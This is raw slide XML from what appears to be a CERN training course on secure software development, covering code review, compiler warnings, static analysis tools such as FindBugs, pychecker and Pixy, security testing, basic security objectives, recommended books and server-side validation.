        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="79882" name="AutoShape 16"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79881" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2277" y="1421"/>
              <a:ext cx="1" cy="485"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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triangle" w="lg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79883" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311" y="1556"/>
              <a:ext cx="807" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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828675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8286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>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>writes data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79878" name="Picture 18" descr="pirat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0938" y="4135438"/>
            <a:ext cx="885825" cy="1147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After implementation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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> your code, let others review it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When a (security) bug is found, search for similar ones!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Making code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open-source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> doesn’t mean that experts will review it seriously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Turn on (and read) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>warnings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl –w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc -Wall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> specific to your programming language: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>bounds checkers, memory testers, bug finders etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disable “core dumped” and debugging information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>memory dumps could contain confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>production code doesn’t need debug information </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javac -g:none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>)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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools that analyse source code, and look for potential:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>security holes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>functionality bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(including those not security related)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Recommendations for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C/C++, Java, Python, Perl, PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>available at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://cern.ch/security/recommendations/en/code_tools.shtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>RPMs provided, some available on LXPLUS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>trivial to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There is no magic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>even the best tool will miss most non-trivial errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>they will just report the findings, but won’t fix the bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Still, using code analysis tools is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highly recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21118033">
            <a:off x="5330825" y="3746500"/>
            <a:ext cx="3568700" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>These tools will help you develop better code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924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Source code static analysis tools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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82947" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Projects\code tools\screenshots\Findbugs-example-detail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525" y="831850"/>
            <a:ext cx="7356475" cy="595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948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Code tools: FindBugs / Java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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="192514" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Projects\code tools\screenshots\pychecker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3688" y="1984375"/>
            <a:ext cx="8467725" cy="3857625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83972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Code tools: pychecker / Python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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="87842"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Code tools: Pixy / PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="E:\Local\2010.06 SWITCH\code\old\Pixy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68850" y="234950"/>
            <a:ext cx="4267200" cy="6511925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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-life-preserver-fai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44550" y="1125538"/>
            <a:ext cx="7710488" cy="5156200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7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="457052">
            <a:off x="428625" y="4710113"/>
            <a:ext cx="3678238" cy="1293812"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security tools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that are disabled, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or impossible to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86021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Things to avoid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Coding - summary</a:t>
            </a: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z="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>learn to design and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>develop </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high quality software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>read and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>follow relevant guidelines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>, books, courses, checklists for security issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="3000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enforce secure coding standards </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>by peer-reviews, using relevant tools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Security testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067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300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> is harder than testing functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Include security testing in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testing plans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>black box testing (tester doesn’t know the inside architecture, code etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>white box testing (the opposite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Systematic approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>, input/output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>a bigger system may have many components: executables, libraries, web pages, scripts etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>and even more interfaces: sockets, wireless connections, http requests, soap requests, shared memory, system environment, command line arguments, pipes, system clipboard, semaphores and mutexes, console input, dialog boxes, files etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>injecting incorrect data: wrong type, zero-length, NULL, random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Simulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hostile environment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Security needs / objectives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mtClean="0"/>
              <a:t>Elements of common understanding of security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (risk of disclosure) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (data altered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> data worthless) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (service is available as desired and designed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Also: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (who is the person, server, software etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (what is that person allowed to do)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (controlling one’s personal information)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anonymity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (remaining unidentified to others)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>non-repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (user can’t deny having taken an action)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (having traces of actions in separate systems/places)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Further reading</a:t>
            </a:r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14500" y="2717800"/>
            <a:ext cx="5689600" cy="1925638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mtClean="0"/>
              <a:t>	Mark G. Graff, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kenneth R. van Wyk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Secure Coding: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Principles and Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89092" name="Picture 4" descr="cover-wsc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1285875"/>
            <a:ext cx="1766888" cy="215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9093" name="Picture 5" descr="cover-scpp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2357438"/>
            <a:ext cx="1695450" cy="254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9094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1785938" y="1355725"/>
            <a:ext cx="5183187" cy="1036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266700" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>	Michael Howard, David LeBlanc </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1"/>
              <a:t>Writing Secure Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5321300"/>
            <a:ext cx="6754813" cy="1036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266700" indent="-266700" algn="r">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>Michael Howard, David LeBlanc, John Viega</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" algn="r">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1"/>
              <a:t>24 Deadly Sins of Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89096" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Training\Developing secure software\2011.05 - CERN course\400000000000000178781_s4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5938" y="3840163"/>
            <a:ext cx="1785937" cy="238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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3059113" y="179388"/>
            <a:ext cx="1865312" cy="692150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011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Networking –  no trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116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300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security on the client side doesn’t work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> (and cannot)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>don’t rely on the client to perform security checks (validation etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>ex.: &lt;input type=”text” maxlength=”20”&gt; is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>authentication should be done on the server side, not by the client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t trust your client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
